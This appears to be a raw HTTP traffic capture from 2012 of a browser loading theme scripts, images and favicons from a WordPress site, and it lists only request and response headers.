Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Fri, 28 Sep 2012 17:59:59 GMT
Etag: &quot;c60fb2-39a8-4cac6d300693a&quot;
Accept-Ranges: bytes
Content-Length: 14760
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/framework/frontend/assets/js/ios-orientationchange-fix.js?ver=3.4.2 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfc9e8-5e3-4c7a5bbd54128&quot;
Accept-Ranges: bytes
Content-Length: 1507
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /wp-content/uploads/2012/08/logo_white_transparent211x150.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Fri, 24 Aug 2012 03:04:03 GMT
Etag: &quot;3d7394ca-5722-4c7fa3a72f1aa&quot;
Accept-Ranges: bytes
Content-Length: 22306
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/images/social-media.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/themes/barelycorporate/assets/css/theme.min.css?ver=1.0
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;3071efd-29bb-4c7a5bbd03020&quot;
Accept-Ranges: bytes
Content-Length: 10683
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/images/menu-bg.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/themes/barelycorporate/assets/css/theme.min.css?ver=1.0
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;3071f99-b36-4c7a5bbd03020&quot;
Accept-Ranges: bytes
Content-Length: 2870
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/images/header-glow.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/themes/barelycorporate/assets/css/theme.min.css?ver=1.0
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;3071f85-1562-4c7a5bbd03020&quot;
Accept-Ranges: bytes
Content-Length: 5474
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/images/social-bg.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/themes/barelycorporate/assets/css/theme.min.css?ver=1.0
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;3071ef8-4bc-4c7a5bbd03020&quot;
Accept-Ranges: bytes
Content-Length: 1212
Keep-Alive: timeout=2, max=194
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/images/home-666666.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/themes/barelycorporate/assets/css/theme.min.css?ver=1.0
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;3071f89-3d6-4c7a5bbd03020&quot;
Accept-Ranges: bytes
Content-Length: 982
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/framework/frontend/assets/images/textures/grunge.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfdd8f-b840-4c7a5bbd49542&quot;
Accept-Ranges: bytes
Content-Length: 47168
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/images/sf-arrows.png HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/themes/barelycorporate/assets/css/theme.min.css?ver=1.0
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;3071eea-448-4c7a5bbd03020&quot;
Accept-Ranges: bytes
Content-Length: 1096
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Tue, 06 Nov 2012 20:01:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 0
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Tue, 06 Nov 2012 20:01:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 0
Keep-Alive: timeout=2, max=194
Connection: Keep-Alive
GET /wp-content/uploads/2011/11/joshua_fall_t.jpg HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Tue, 06 Nov 2012 20:01:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked